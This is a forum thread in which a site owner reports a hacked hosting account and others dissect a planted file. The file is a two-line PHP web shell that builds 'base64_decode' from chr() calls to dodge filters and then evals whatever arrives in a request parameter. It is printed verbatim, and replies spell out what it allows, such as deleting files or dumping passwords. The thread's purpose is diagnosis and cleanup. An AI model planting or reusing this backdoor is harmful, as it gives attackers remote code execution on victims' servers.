I just spoke with my hosting Live Chat. I couldn’t see the headers in the e-mail. The guy said it appears to be from Amazon. Not malicious. When I Google the script, however, it comes up “attack and defence” (sic) script.
Sorry … I meant Google linked ‘sam’ with simple ad manager. I don’t use Simple Ad Manager. But, yeah, it appears as if a start-from-scratch strategy is the best.
In this case it is being used to make base64_decode not be easily noticeable.
As for Amazon, no benefit that I can see. Why would they want to hide that if it’s legit?
If a script-kiddie on the other hand, it would make them feel “clever” and it would get by filters that look for the use of that function name as a string.
Irony is that most look for the function name “eval” so it’s moot here. The code will still trigger a red flag.
That… would be a security hole a mile wide. eval(base64_decode($_REQUEST[sam]));… "Take WHATEVER i put on the URL in the ‘sam’ variable and execute it. Whatever it is. sam = “unlink(index.php)”? Blow up your index file. dump your password file to the screen? Sure thing! Open up a hole into your database? Not a problem.
waited (I have been having problems with my host’s cpanel directory-password protection option)
I just re-checked site, and there is a ‘sample’ php file on there, and it contains the one line: < … script language=“php”>
$a=chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99).chr(111).chr(100).chr(101);
eval($a($_REQUEST[sam]));
So email amazon’s spoofer email (stop-spoofing@amazon.com), attach the email in question, and tell them that someone appears to be using one of their clients’ contact systems as an attempt at hacking a site. (though why the email came to YOU is a good question.)
Why it came to me? Not sure why me specifically. My hosting account was suspended recently due to high-volume of CPU usage. These were just portfolio-type design sites, so I went through and deleted all the files and deleted the Wordpress installation. I changed the FTP password, but evidently my master account pw has been obtained because within 2 hours, this maddening sample.php file has appeared.